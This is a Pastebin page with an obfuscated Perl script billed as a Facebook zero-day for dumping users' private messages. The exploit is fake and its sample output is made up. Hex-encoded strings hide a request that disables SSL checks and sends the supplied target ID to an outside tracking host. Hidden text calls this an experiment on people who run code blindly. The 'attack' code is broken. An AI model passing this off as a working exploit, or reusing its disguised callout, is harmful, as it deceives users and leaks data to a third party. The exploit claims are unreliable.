API tools faq
paste
Advertisement
Kyfx

[+] Facepwn: Facebook 0day for capturing users messages [+]

Kyfx
May 14th, 2015
519
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.82 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #usage: facepwn.pl [target]
  3. #Example output:
  4. #./facepwn.pl their.facebook.id123
  5. #[+] Building sploit
  6. #[+] Attacking their.facebook.id123
  7. #[+] Success! Dumping data:
  8. #<[[
  9. #[User_id]:98372299836
  10. #dGhpcyBpcyBhIHByaXZhdGUgbWVzc2FnZSE=
  11. #...[snip]...
  12.  
  13. use warnings;
  14. use strict;
  15. use WWW::Mechanize;
  16.  
  17. # build the 0day exploit containing target name/facebook_ID
  18. # returns network stack to 'probe' the backend mobile listener
  19. # when listener is probed, data is leaked
  20. # may require a flux capacitor
  21. sub build_sploit{
  22. my $target=shift;
  23. #buid payload
  24. print "[+] Building sploit\n";
  25. my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65";
  26. my @OOO0=("\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c");
  27. my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65";
  28. my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65";
  29. #initiate network stack
  30. my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
  31. my $OO00O="\x4c\x6f\x6f\x6b\x73\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x64\x65\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x74\x68\x65\x20\x63\x6f\x64\x65\x2e\x2e\x2e";
  32. my $OO0="\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x73\x69\x6d\x70\x6c\x65\x20\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x20\x74\x6f\x20\x73\x65\x65\x20\x68\x6f\x77\x20\x6d\x61\x6e\x79\x20\x70\x65\x6f\x70\x6c\x65\x20\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x62\x6c\x69\x6e\x64\x6c\x79";
  33. my $OO0O="\x62\x6c\x6f\x67\x20\x70\x6f\x73\x74\x20\x72\x65\x76\x65\x61\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x20\x77\x69\x6c\x6c\x20\x62\x65\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x73\x6f\x6f\x6e\x2e\x2e\x2e\x73\x74\x61\x79\x20\x74\x75\x6e\x65\x64";
  34. my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target";
  35. $OOO0O->get($OO000);
  36. #build network stack
  37. push @0000,$OO00O;
  38. #push target ID onto stack
  39. push @0000,$target;
  40. push @0000,$OO0;
  41. push @0000,$OO0O;
  42. return @0000;
  43. }
  44.  
  45. #build sploit from target {user_input}
  46. my @payloads=build_sploit($ARGV[0]);
  47. #iterate through the stack and fire payloads:
  48. foreach(@payloads){
  49. my $attack=WWW::Mechanize->new();
  50. print "[+] Attacking $ARGV[0]...\n";
  51. if(my $attack="x73\x3a\x2f\x2f" eq $_ ? 1 : 0){
  52. my $messages=$attack->get("https://m.facebook.com/m/01/messages/$_");
  53. print "[+] Success! Dumping data:\n";
  54. print $messages;
  55. }else{
  56. print "[!] Something went wrong, modify the payload.\n";
  57. exit 1;
  58. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!